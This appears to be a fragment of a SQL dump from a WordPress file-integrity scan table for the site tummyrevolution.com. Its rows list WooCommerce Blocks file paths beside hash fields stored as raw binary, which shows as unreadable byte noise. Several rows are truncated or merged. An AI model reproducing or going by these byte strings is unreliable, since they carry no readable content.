BHt\r:6','t[!\rdq[`rZeBP`~0aV','',0,'?'),('1jޥDLZ0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S$d\\w$PZ','ʜ&zNasHlȊsH\"@\Zx(','',0,'?'),('W`\rEC/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/get-validity-message-for-input.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/get-validity-message-for-input.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7rX\0&','Vc3Mxer%u8R3l+ /','',0,'?'),('T2Uu8iƦJRS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SR*pWnS\ZA','pSs;y=9W$u}ƵU','',0,'?'),(' %Rv6}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/is-postcode.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/is-postcode.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' N0⨶1M','s퉚LwȺ$J֘\n+','',0,'?'),('._1qf_!','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/must-contain.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/must-contain.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڲa+>E߶&hET','YP}T1OYRU(UԜNkYK','',0,'?'),('\'gN1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/test/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/test/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{BQ`o35|','DDF>+Lyk!ap=f_qNi','',0,'?'),('r\0qyJŨ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/test/is-postcode.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/utils/validation/test/is-postcode.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӏ۲UaR2uAf','yc X3W:jOcÞ(','',0,'?'),('e<\0\0UEOb\Zȥ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h=blx{','\"j.gR1b2\0AKn','',0,'?'),('Jj1>qaK=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hc$1m{r','n7c4\' 8̾4Ѥh^Ѝ̭','',0,'?'),('RC/V>g','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/price.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/price.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܷ6|b(D6','R\nBS<ȎxET{M\nt','',0,'?'),('U\rC-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/test/price.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/prices/utils/test/price.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\nelUA\\',' _KTJ߯^?3\n})5\"oPK;-','',0,'?'),(':~d等W}֧:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patches/wordpress-components+14.2.0.patch','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patches/wordpress-components+14.2.0.patch',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ynppTI',' 2/7f8(ۍfD1$ޭ','',0,'?'),('v?*`a','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{(8%{9x',' ;92EZYw\Z|h@g3t9o','',0,'?'),('[S','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/discount-banner-with-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/discount-banner-with-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì[`nUx]W','9` H/wbԻ$ņv7','',0,'?'),('qúYzYČ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/discount-banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/discount-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`JP\n3|r','G* I _n3','',0,'?'),('W?॥EOI4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-category-focus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-category-focus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƉiT',']3T&Z\rڊ\'n\ZwFI','',0,'?'),('6Ę#Dƌ&H3z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-category-triple.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-category-triple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㝿Ԩƹtw(',',NA ua\rsK{~nO,!','',0,'?'),('cT#zY⸳1Z_D','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-products-5-cols.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-products-5-cols.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(LYԭz0ƴW',';\'r|:B*f\ZT\0','',0,'?'),('S7lƲL \nJ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-products-fresh-and-tasty.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/featured-products-fresh-and-tasty.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C9к6汱',')Ҩf: ɃCV_sZ','',0,'?'),(' m5 i8 ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/filters.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l%#w-5`7','tk~>طJ}CkUx/rl','',0,'?'),('\"AF…vTP5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-large-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-large-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\r?Y;V`','XS}1. i!X/ʵh^IO','',0,'?'),('Fۺ/К$>7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-large.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-large.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#wǚ \rB ','o=ڥWhooSj%','',0,'?'),('ٲk?A^T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OK`9DX','ojqye|t)9 ~Վg нB܈n|','',0,'?'),('M@vVXBS|a0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple-menu-and-cart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple-menu-and-cart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!68R|l','˼]yT՟s.v>CIB.<','',0,'?'),('dJY\0vq=Qߴ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-simple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)zSҜ','|\r[jcSf\0֯,KН','',0,'?'),('CrT!T|\"[>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-2-menus-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-2-menus-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \n5VF',' ?0V NB8[,O0&eD`P\\|E','',0,'?'),('4M[|\0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-2-menus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-2-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[|ρIB','Efjl@鲞%3!V^e','',0,'?'),('֝Qmr]f~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-3-menus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/footer-with-3-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%J讪+՗yVZ','zLsZ9ȭbPvt.׶%','',0,'?'),('xB,3KCW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-centered-search-pattern.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-centered-search-pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WLaCK?','׫)%=6X5~He\nO|Y,M','',0,'?'),('a!HM5g%FtT','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-essential-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-essential-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dQ#:\\@X\"y','b\"jkuuV#$(','',0,'?'),('yi8).,;=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-essential.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-essential.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3KeCNXaHR','J(#|V +M] *d','',0,'?'),('b5Ndv5E\0!\r\n','\n8Nn>zCZr{6)c','',0,'?'),('^$JOA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-minimal.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/header-minimal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YiĤt QВS','M~\0 QyC?+3˺ǯ','',0,'?'),('aڲ4ĩ68\'l','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-3-split.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-3-split.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V]7s4','; \rﶛÒpgX)\ntvz','',0,'?'),('ddw;.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-chessboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-chessboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rx\'_~','a56t\\(B,LYcC]ҚDLN','',0,'?'),('PTBP~_9xU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-split.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/hero-product-split.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']N4o\n!sZ[\0\0','5?fDBF XRW,2p<\nṔn','',0,'?'),('rMLQ#gI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/just-arrived-full-hero.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/just-arrived-full-hero.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`o`;f\\','l!|푊ʵrBBȆ5=U{!/U&','',0,'?'),('\\t','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/no-products-found.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/no-products-found.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r L (:g\nFZ','\nM] u,Kňᤱ]','',0,'?'),('{\r\\H- j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5!\"oC<','BQ<+KRU-\'|BB7P','',0,'?'),(')7t dI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-full-grid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-full-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z%2[5p y','r\'?V\"1I b=x','',0,'?'),('\n% 2a(*Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-grid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{:%&MgԷ','h*GMuH%? hgܗaV','',0,'?'),('dz)%FO% ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-rows.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collection-rows.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')3\0L[q!*`e','@ސWFwCe_\ncM4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collections-newest-arrivals.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-collections-newest-arrivals.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' mU7V@v&','[\ne4|b }Rٔ~V\0]s+r','',0,'?'),('*JTN<\'~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-details-listing.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-details-listing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' )GL-x','Evwhv .~:+`m5Us','',0,'?'),('\'e;b ʷUS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-details-pattern.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-details-pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SF`._tΎ','\\ cנ1+Qu9BĀ','',0,'?'),('\ZȆYR_,\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-featured-2-columns.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-featured-2-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bLKs`','9_zwU{n|rC\n6B+','Mz 7uʅTcI\\Tgr=','',0,'?'),('od w','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-4-column-product-row.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-4-column-product-row.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bVӁǔЄB','S2Vv\'RlL:.\'}SMC','',0,'?'),('oLnHCRvk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-large-image-product-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-large-image-product-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sR[Ƀ6D ','f%8iK]eďiO=0','',0,'?'),('|\"BW5G6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-minimal-5-column-products-row.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-minimal-5-column-products-row.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!%sxiMi','$}0T0 IkԑX\nq\r','',0,'?'),('T`8*o#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-minimal-product-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-minimal-product-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3vg/6켨D0W','6[;x]`|]t2Ea;t}g','',0,'?'),('ӍI Y{hOҝB1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','04 >O N$','\\M%I!?M=GeR','',0,'?'),('!F[ܳoP ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-list-with-1-1-images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-list-with-1-1-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.i]LO\0a(','v!sWA\Z\n\r0>F2izBf^ҵ','',0,'?'),('Is\\N','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-list-with-full-product-description.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-query-product-list-with-full-product-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Lݢld','Ɯh_F翳<NBVYkE','',0,'?'),('s = @','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-search-form.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/product-search-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͧ71E9N$','\Z,#2:8  6N','',0,'?'),('T1ۢHc\ri','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/shop-by-price.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/shop-by-price.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CtC$b(Y>','6/0Bm(99 d/SiC','',0,'?'),('A }0$gi{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/small-discount-banner-with-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/small-discount-banner-with-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@Oíp<[x','}IͦQF@x7((SD T','',0,'?'),('b1J\r_j}*v','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/social-follow-us-in-social-media.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/social-follow-us-in-social-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9w7]O0!}K','a> kޞ&zti`RGú','',0,'?'),('X|0-X','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/store-info-alt-image-and-text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/store-info-alt-image-and-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\*1|5f','Tٰ(>\'\rct9f&','',0,'?'),('&&$~ǭkڽ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/testimonials-3-columns.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/testimonials-3-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ǩx#^~|@','_&JPW\"6V]A8B4x^','',0,'?'),('WlMv;`fH}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/testimonials-single.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/patterns/testimonials-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|XZ ڠ^y','NRYwfQ|BKv\"aS Ox','',0,'?'),('Ăڒ#cA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!#}`.&3r','kpbCf+Ne\0iPq>U','',0,'?'),('\'>ͧdRk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets/Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets/Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wldª\'\'[','?޻I!v[pwß','',0,'?'),('8I70Tw4x','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets/AssetDataRegistry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets/AssetDataRegistry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=}\Zvţ','] ? f?㹇lҝ DdzO3','',0,'?'),('F Z2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\ryy','B6o>98ب,Ư j`V','',0,'?'),(' y@Iŧ ju','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/AssetsController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/AssetsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9\rͩ+','Nfb$s-d%I\"}ej.bL','',0,'?'),('\ZUgю2xBAI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockPatterns.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockPatterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?BY ,AYʾ','`TT@K1/⇨iO','',0,'?'),('2#18s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTemplatesController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTemplatesController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PA6O-~X\Z','˃zwIQBKnWâ2]\\`','',0,'?'),('xP w8Z:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w{$Z^=','\\ӞH9%DC:-M÷hcZ\n','',0,'?'),('m\r_NIFa','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractDynamicBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractDynamicBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%hh賲߭}','rK\\Oq́ /ˠ 12-Z ڞ@','',0,'?'),('k0`{b[R','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractInnerBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractInnerBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SM_ p*','ȌGJ8׫86²!ZҰPY[','',0,'?'),('{ǑU5sn=[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractProductGrid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractProductGrid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k|M/0@','e5Y )t0ΰ1Zi','',0,'?'),('BTp\\|kKBl9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ActiveFilters.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ActiveFilters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0tٔdG8; ','%Y\'OS}oe~#V_','',0,'?'),('mfe(Li~>{F','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AddToCartForm.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AddToCartForm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[8[N','AlA;Kr@R]b*','etF.F^^vʢKDk>9','',0,'?'),('N!]\"mV1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AllReviews.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AllReviews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G5ւ]@DII\ZН','%@N&蛘e>0Uv\'\Z','',0,'?'),('C_Q)fW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AtomicBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AtomicBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','brkPa)zpe','Ay3\ZwXeAoWx~&;@','',0,'?'),('m9co6\"@C','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AttributeFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AttributeFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2]ݛ?t]Ed=\rv','',0,'?'),('D| o ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartExpressPaymentBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartExpressPaymentBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7dY7IH','\Z=` o)σ,I2d@p\Z6','',0,'?'),('HSsnȬ%H','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartItemsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartItemsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','):T][7˗K','X Z;\"BJ0,X@','',0,'?'),('ثL,|W4\Z,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartLineItemsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartLineItemsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 5׎e\0e','2**\Zpq@f5Y +2{','',0,'?'),(']?BbMm:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';{<[D','̅K XNYT|EM^\'.xk','',0,'?'),('tDhF޵ 